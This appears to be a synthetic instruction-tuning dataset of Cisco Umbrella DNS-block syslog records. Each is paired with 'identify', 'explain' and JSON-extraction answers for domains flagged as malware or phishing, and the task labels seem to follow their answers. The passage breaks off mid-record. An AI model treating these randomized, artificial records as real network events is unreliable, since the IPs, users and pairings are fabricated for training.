WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"131.83.161.58","externalIp":"219.46.163.18","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=131.83.161.58 ::: serverIP=219.46.163.18 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"131.83.161.58","externalIp":"219.46.163.18","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"nighthawk","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=131.83.161.58 ::: serverIP=219.46.163.18 ::: userName=nighthawk ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T20:29:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 131.83.161.58 serverIP: 219.46.163.18 userName: nighthawk
Explain this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"202.101.178.238","externalIp":"171.242.144.40","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=202.101.178.238 ::: serverIP=171.242.144.40 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "pushclk-10416.com", "message": "WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"202.101.178.238\",\"externalIp\":\"171.242.144.40\",\"categories\":[\"Advertisements\",\"Malware\",\"Phishing\"],\"tags\":[],\"destination\":\"pushclk-10416.com\",\"originLabel\":\"bob\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-18T20:29:12.000Z\"} ::: clientIP=202.101.178.238 ::: serverIP=171.242.144.40 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "pushclk-10416.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-18T20:29:12.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "AdvertisementsMalwarePhishing", "streamName": "OpenDNS Detection", "clientIP": "202.101.178.238", "serverIP": "171.242.144.40", "userName": "bob" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"202.101.178.238","externalIp":"171.242.144.40","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=202.101.178.238 ::: serverIP=171.242.144.40 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=pushclk-10416.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"202.101.178.238","externalIp":"171.242.144.40","categories":["Advertisements","Malware","Phishing"],"tags":[],"destination":"pushclk-10416.com","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-18T20:29:12.000Z"} ::: clientIP=202.101.178.238 ::: serverIP=171.242.144.40 ::: userName=bob ::: created_at=2023-05-18T20:29:12.000Z ::: streamName=OpenDNS Detection ::: vendorCode=AdvertisementsMalwarePhishing ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-18T20:29:12.000Z ::: serverHostname=pushclk-10416.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: pushclk-10416.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: pushclk-10416.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-18T20:29:12.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: AdvertisementsMalwarePhishing streamName: OpenDNS Detection clientIP: 202.101.178.238 serverIP: 171.242.144.40 userName: bob
Explain this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"33.165.95.100","externalIp":"79.177.129.194","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=33.165.95.100 ::: serverIP=79.177.129.194 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "rum.browser-intake-foxbusiness.com", "message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"33.165.95.100\",\"externalIp\":\"79.177.129.194\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=33.165.95.100 ::: serverIP=79.177.129.194 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "rum.browser-intake-foxbusiness.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-03-30T16:39:53.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Malware", "streamName": "OpenDNS Detection", "clientIP": "33.165.95.100", "serverIP": "79.177.129.194", "userName": "janedoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"33.165.95.100","externalIp":"79.177.129.194","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=33.165.95.100 ::: serverIP=79.177.129.194 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"33.165.95.100","externalIp":"79.177.129.194","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=33.165.95.100 ::: serverIP=79.177.129.194 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: rum.browser-intake-foxbusiness.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: rum.browser-intake-foxbusiness.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-03-30T16:39:53.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Malware streamName: OpenDNS Detection clientIP: 33.165.95.100 serverIP: 79.177.129.194 userName: janedoe
Explain this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"156.223.20.130","externalIp":"62.242.34.199","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=156.223.20.130 ::: serverIP=62.242.34.199 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "rum.browser-intake-foxbusiness.com", "message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"156.223.20.130\",\"externalIp\":\"62.242.34.199\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"alice\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=156.223.20.130 ::: serverIP=62.242.34.199 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "rum.browser-intake-foxbusiness.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-03-30T16:39:53.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Malware", "streamName": "OpenDNS Detection", "clientIP": "156.223.20.130", "serverIP": "62.242.34.199", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"156.223.20.130","externalIp":"62.242.34.199","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=156.223.20.130 ::: serverIP=62.242.34.199 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"156.223.20.130","externalIp":"62.242.34.199","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=156.223.20.130 ::: serverIP=62.242.34.199 ::: userName=alice ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: rum.browser-intake-foxbusiness.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: rum.browser-intake-foxbusiness.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-03-30T16:39:53.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Malware streamName: OpenDNS Detection clientIP: 156.223.20.130 serverIP: 62.242.34.199 userName: alice
Explain this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"97.237.106.37","externalIp":"16.9.44.15","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=97.237.106.37 ::: serverIP=16.9.44.15 ::: userName=fish ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "rum.browser-intake-foxbusiness.com", "message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"97.237.106.37\",\"externalIp\":\"16.9.44.15\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"fish\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=97.237.106.37 ::: serverIP=16.9.44.15 ::: userName=fish ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "rum.browser-intake-foxbusiness.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-03-30T16:39:53.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Malware", "streamName": "OpenDNS Detection", "clientIP": "97.237.106.37", "serverIP": "16.9.44.15", "userName": "fish" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"97.237.106.37","externalIp":"16.9.44.15","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=97.237.106.37 ::: serverIP=16.9.44.15 ::: userName=fish ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"97.237.106.37","externalIp":"16.9.44.15","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"fish","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=97.237.106.37 ::: serverIP=16.9.44.15 ::: userName=fish ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: rum.browser-intake-foxbusiness.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: rum.browser-intake-foxbusiness.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-03-30T16:39:53.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Malware streamName: OpenDNS Detection clientIP: 97.237.106.37 serverIP: 16.9.44.15 userName: fish
Explain this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"135.100.169.50","externalIp":"88.219.150.243","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=135.100.169.50 ::: serverIP=88.219.150.243 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "rum.browser-intake-foxbusiness.com", "message": "WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"135.100.169.50\",\"externalIp\":\"88.219.150.243\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"rum.browser-intake-foxbusiness.com\",\"originLabel\":\"janedoe\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-03-30T16:39:53.000Z\"} ::: clientIP=135.100.169.50 ::: serverIP=88.219.150.243 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "rum.browser-intake-foxbusiness.com", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-03-30T16:39:53.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Malware", "streamName": "OpenDNS Detection", "clientIP": "135.100.169.50", "serverIP": "88.219.150.243", "userName": "janedoe" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"135.100.169.50","externalIp":"88.219.150.243","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=135.100.169.50 ::: serverIP=88.219.150.243 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=rum.browser-intake-foxbusiness.com ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"135.100.169.50","externalIp":"88.219.150.243","categories":["Malware"],"tags":[],"destination":"rum.browser-intake-foxbusiness.com","originLabel":"janedoe","actionTaken":"BLOCKED","datetime":"2023-03-30T16:39:53.000Z"} ::: clientIP=135.100.169.50 ::: serverIP=88.219.150.243 ::: userName=janedoe ::: created_at=2023-03-30T16:39:53.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-03-30T16:39:53.000Z ::: serverHostname=rum.browser-intake-foxbusiness.com ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: rum.browser-intake-foxbusiness.com messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: rum.browser-intake-foxbusiness.com severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-03-30T16:39:53.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Malware streamName: OpenDNS Detection clientIP: 135.100.169.50 serverIP: 88.219.150.243 userName: janedoe
Explain this syslog message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"109.110.10.199","externalIp":"197.204.252.202","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=109.110.10.199 ::: serverIP=197.204.252.202 ::: userName=alice ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "fructed-vulgarizers-mixology.click", "message": "WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"109.110.10.199\",\"externalIp\":\"197.204.252.202\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"fructed-vulgarizers-mixology.click\",\"originLabel\":\"alice\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T10:40:30.000Z\"} ::: clientIP=109.110.10.199 ::: serverIP=197.204.252.202 ::: userName=alice ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "fructed-vulgarizers-mixology.click", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-25T10:40:30.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Malware", "streamName": "OpenDNS Detection", "clientIP": "109.110.10.199", "serverIP": "197.204.252.202", "userName": "alice" }
Create a JSON artifact from the message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"109.110.10.199","externalIp":"197.204.252.202","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=109.110.10.199 ::: serverIP=197.204.252.202 ::: userName=alice ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
Product: Umbrella Vendor: Cisco
Identify this syslog message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"109.110.10.199","externalIp":"197.204.252.202","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"alice","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=109.110.10.199 ::: serverIP=197.204.252.202 ::: userName=alice ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
This is a syslog message from a product called Umbrella by Cisco. The following fields were extracted from the message: action: block fqdn: fructed-vulgarizers-mixology.click messagetype: firewall_action productids: [38] senderhost: kafka.precinct sensitivity: normal serverhostname: fructed-vulgarizers-mixology.click severitycode: 2 severitylabel: critical sourceinfo: unknown starttimeutc: 2023-05-25T10:40:30.000Z tags: ['OpenDNS Detection', 'firewall_action'] vendorcode: Malware streamName: OpenDNS Detection clientIP: 109.110.10.199 serverIP: 197.204.252.202 userName: alice
Explain this syslog message
WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={"originId":600808038,"originType":"Network Devices","internalIp":"166.106.104.132","externalIp":"251.142.138.134","categories":["Malware"],"tags":[],"destination":"fructed-vulgarizers-mixology.click","originLabel":"bob","actionTaken":"BLOCKED","datetime":"2023-05-25T10:40:30.000Z"} ::: clientIP=166.106.104.132 ::: serverIP=251.142.138.134 ::: userName=bob ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch
{ "action": "block", "fqdn": "fructed-vulgarizers-mixology.click", "message": "WitFoo-Artifact ::: fqdn=fructed-vulgarizers-mixology.click ::: action=BLOCKED ::: message={\"originId\":600808038,\"originType\":\"Network Devices\",\"internalIp\":\"166.106.104.132\",\"externalIp\":\"251.142.138.134\",\"categories\":[\"Malware\"],\"tags\":[],\"destination\":\"fructed-vulgarizers-mixology.click\",\"originLabel\":\"bob\",\"actionTaken\":\"BLOCKED\",\"datetime\":\"2023-05-25T10:40:30.000Z\"} ::: clientIP=166.106.104.132 ::: serverIP=251.142.138.134 ::: userName=bob ::: created_at=2023-05-25T10:40:30.000Z ::: streamName=OpenDNS Detection ::: vendorCode=Malware ::: messageType=firewall_action ::: pipelineName=OpenDNS Detection ::: severityCode=2 ::: startTimeUTC=2023-05-25T10:40:30.000Z ::: serverHostname=fructed-vulgarizers-mixology.click ::: pipelineEntrypoint=dispatch", "messagetype": "firewall_action", "productids": [ 38 ], "senderhost": "kafka.precinct", "sensitivity": "normal", "serverhostname": "fructed-vulgarizers-mixology.click", "severitycode": 2, "severitylabel": "critical", "sourceinfo": "unknown", "starttimeutc": "2023-05-25T10:40:30.000Z", "tags": [ "OpenDNS Detection", "firewall_action" ], "vendorcode": "Malware", "streamName": "OpenDNS Detection", "clientIP": 